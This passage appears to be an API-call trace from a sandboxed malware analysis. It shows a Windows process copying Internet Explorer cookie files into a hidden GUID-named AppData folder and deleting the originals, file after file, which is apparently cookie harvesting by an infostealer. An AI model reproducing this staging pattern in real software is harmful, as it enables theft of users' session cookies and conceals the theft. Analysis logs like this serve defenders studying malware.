lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\Low", lpString2="\\" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\Low\\") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\Low\\" [0253.061] StrChrW (lpStart="UBUPNOZC.txt", wMatch=0x74c005c) returned 0x0 [0253.061] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\Low\\", lpString2="UBUPNOZC.txt" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\Low\\UBUPNOZC.txt") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\Low\\UBUPNOZC.txt" [0253.061] CopyFileW (lpExistingFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\INetCookies\\Low\\UBUPNOZC.txt" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\windows\\inetcookies\\low\\ubupnozc.txt"), lpNewFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\Low\\UBUPNOZC.txt" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\microsoft\\{24a75f92-33c8-f66f-dd98-178a614c3b5e}\\cookie.ie\\low\\ubupnozc.txt"), bFailIfExists=0) returned 1 [0253.066] DeleteFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\INetCookies\\Low\\UBUPNOZC.txt" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\windows\\inetcookies\\low\\ubupnozc.txt")) returned 1 [0253.067] lstrcpyW (in: lpString1=0x7aae530, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}" [0253.067] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}", lpString2="\\cookie.ie" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie" [0253.067] CreateDirectoryW (lpPathName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\microsoft\\{24a75f92-33c8-f66f-dd98-178a614c3b5e}\\cookie.ie"), lpSecurityAttributes=0x0) returned 0 [0253.067] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie", lpString2="\\" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\" [0253.067] StrChrW (lpStart="Low\\UBXQG39X.txt", wMatch=0x74c005c) returned="\\UBXQG39X.txt" [0253.067] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\", lpString2="Low" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\Low") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\Low" [0253.067] CreateDirectoryW (lpPathName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\Low" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\microsoft\\{24a75f92-33c8-f66f-dd98-178a614c3b5e}\\cookie.ie\\low"), lpSecurityAttributes=0x0) returned 0 [0253.067] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\Low", lpString2="\\" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\Low\\") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\Low\\" [0253.067] StrChrW (lpStart="UBXQG39X.txt", wMatch=0x74c005c) returned 0x0 [0253.067] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\Low\\", lpString2="UBXQG39X.txt" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\Low\\UBXQG39X.txt") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\Low\\UBXQG39X.txt" [0253.068] CopyFileW (lpExistingFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\INetCookies\\Low\\UBXQG39X.txt" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\windows\\inetcookies\\low\\ubxqg39x.txt"), lpNewFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\Low\\UBXQG39X.txt" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\microsoft\\{24a75f92-33c8-f66f-dd98-178a614c3b5e}\\cookie.ie\\low\\ubxqg39x.txt"), bFailIfExists=0) returned 1 [0253.072] DeleteFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\INetCookies\\Low\\UBXQG39X.txt" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\windows\\inetcookies\\low\\ubxqg39x.txt")) returned 1 [0253.073] lstrcpyW (in: lpString1=0x7aae530, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}" [0253.073] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}", lpString2="\\cookie.ie" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie" [0253.073] CreateDirectoryW (lpPathName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\microsoft\\{24a75f92-33c8-f66f-dd98-178a614c3b5e}\\cookie.ie"), lpSecurityAttributes=0x0) returned 0 [0253.073] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie", lpString2="\\" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\" [0253.073] StrChrW (lpStart="Low\\UGL14QS0.txt", wMatch=0x74c005c) returned="\\UGL14QS0.txt" [0253.073] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\", lpString2="Low" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\Low") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\Low" [0253.074] CreateDirectoryW (lpPathName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\Low" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\microsoft\\{24a75f92-33c8-f66f-dd98-178a614c3b5e}\\cookie.ie\\low"), lpSecurityAttributes=0x0) returned 0 [0253.074] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\Low", lpString2="\\" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\Low\\") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\Low\\" [0253.074] StrChrW (lpStart="UGL14QS0.txt", wMatch=0x74c005c) returned 0x0 [0253.074] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\Low\\", lpString2="UGL14QS0.txt" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\Low\\UGL14QS0.txt") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\Low\\UGL14QS0.txt" [0253.074] CopyFileW (lpExistingFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\INetCookies\\Low\\UGL14QS0.txt" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\windows\\inetcookies\\low\\ugl14qs0.txt"), lpNewFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\Low\\UGL14QS0.txt" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\microsoft\\{24a75f92-33c8-f66f-dd98-178a614c3b5e}\\cookie.ie\\low\\ugl14qs0.txt"), bFailIfExists=0) returned 1 [0253.079] DeleteFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\INetCookies\\Low\\UGL14QS0.txt" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\windows\\inetcookies\\low\\ugl14qs0.txt")) returned 1 [0253.080] lstrcpyW (in: lpString1=0x7aae530, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}" [0253.080] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}", lpString2="\\cookie.ie" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie" [0253.080] CreateDirectoryW (lpPathName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\microsoft\\{24a75f92-33c8-f66f-dd98-178a614c3b5e}\\cookie.ie"), lpSecurityAttributes=0x0) returned 0 [0253.080] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie", lpString2="\\" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\" [0253.080] StrChrW (lpStart="Low\\UUEVXDWP.txt", wMatch=0x74c005c) returned="\\UUEVXDWP.txt" [0253.080] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\", lpString2="Low" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\Low") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\Low" [0253.080] CreateDirectoryW (lpPathName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\Low" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\microsoft\\{24a75f92-33c8-f66f-dd98-178a614c3b5e}\\cookie.ie\\low"), lpSecurityAttributes=0x0) returned 0 [0253.080] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\Low", lpString2="\\" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\Low\\") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\Low\\" [0253.080] StrChrW (lpStart="UUEVXDWP.txt", wMatch=0x74c005c) returned 0x0 [0253.080] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\Low\\", lpString2="UUEVXDWP.txt" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\Low\\UUEVXDWP.txt") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\Low\\UUEVXDWP.txt" [0253.080] CopyFileW (lpExistingFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\INetCookies\\Low\\UUEVXDWP.txt" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\windows\\inetcookies\\low\\uuevxdwp.txt"), lpNewFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\Low\\UUEVXDWP.txt" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\microsoft\\{24a75f92-33c8-f66f-dd98-178a614c3b5e}\\cookie.ie\\low\\uuevxdwp.txt"), bFailIfExists=0) returned 1 [0253.084] DeleteFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\INetCookies\\Low\\UUEVXDWP.txt" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\windows\\inetcookies\\low\\uuevxdwp.txt")) returned 1 [0253.085] lstrcpyW (in: lpString1=0x7aae530, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}" [0253.085] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}", lpString2="\\cookie.ie" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie" [0253.085] CreateDirectoryW (lpPathName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\microsoft\\{24a75f92-33c8-f66f-dd98-178a614c3b5e}\\cookie.ie"), lpSecurityAttributes=0x0) returned 0 [0253.085] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie", lpString2="\\" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\" [0253.085] StrChrW (lpStart="Low\\V7NNCJHO.txt", wMatch=0x74c005c) returned="\\V7NNCJHO.txt" [0253.085] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\", lpString2="Low" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\Low") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\Low" [0253.086] CreateDirectoryW (lpPathName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\Low" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\microsoft\\{24a75f92-33c8-f66f-dd98-178a614c3b5e}\\cookie.ie\\low"), lpSecurityAttributes=0x0) returned 0 [0253.086] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\Low", lpString2="\\" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\Low\\") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\Low\\" [0253.086] StrChrW (lpStart="V7NNCJHO.txt", wMatch=0x74c005c) returned 0x0 [0253.086] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\Low\\", lpString2="V7NNCJHO.txt" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\Low\\V7NNCJHO.txt") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\Low\\V7NNCJHO.txt" [0253.086] CopyFileW (lpExistingFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\INetCookies\\Low\\V7NNCJHO.txt" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\windows\\inetcookies\\low\\v7nncjho.txt"), lpNewFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\Low\\V7NNCJHO.txt" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\microsoft\\{24a75f92-33c8-f66f-dd98-178a614c3b5e}\\cookie.ie\\low\\v7nncjho.txt"), bFailIfExists=0) returned 1 [0253.090] DeleteFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\INetCookies\\Low\\V7NNCJHO.txt" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\windows\\inetcookies\\low\\v7nncjho.txt")) returned 1 [0253.091] lstrcpyW (in: lpString1=0x7aae530, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}" [0253.091] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}", lpString2="\\cookie.ie" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie" [0253.091] CreateDirectoryW (lpPathName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\microsoft\\{24a75f92-33c8-f66f-dd98-178a614c3b5e}\\cookie.ie"), lpSecurityAttributes=0x0) returned 0 [0253.091] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie", lpString2="\\" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\" [0253.091] StrChrW (lpStart="Low\\VD3GM2DA.txt", wMatch=0x74c005c) returned="\\VD3GM2DA.txt" [0253.091] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\", lpString2="Low" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\Low") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\Low" [0253.092] CreateDirectoryW (lpPathName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\Low" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\microsoft\\{24a75f92-33c8-f66f-dd98-178a614c3b5e}\\cookie.ie\\low"), lpSecurityAttributes=0x0) returned 0 [0253.092] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\Low", lpString2="\\" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\Low\\") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\Low\\" [0253.092] StrChrW (lpStart="VD3GM2DA.txt", wMatch=0x74c005c) returned 0x0 [0253.092] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\Low\\", lpString2="VD3GM2DA.txt" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\Low\\VD3GM2DA.txt") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\Low\\VD3GM2DA.txt" [0253.092] CopyFileW (lpExistingFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\INetCookies\\Low\\VD3GM2DA.txt" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\windows\\inetcookies\\low\\vd3gm2da.txt"), lpNewFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\Low\\VD3GM2DA.txt" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\microsoft\\{24a75f92-33c8-f66f-dd98-178a614c3b5e}\\cookie.ie\\low\\vd3gm2da.txt"), bFailIfExists=0) returned 1 [0253.119] DeleteFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\INetCookies\\Low\\VD3GM2DA.txt" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\windows\\inetcookies\\low\\vd3gm2da.txt")) returned 1 [0253.120] lstrcpyW (in: lpString1=0x7aae530, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}" | out: 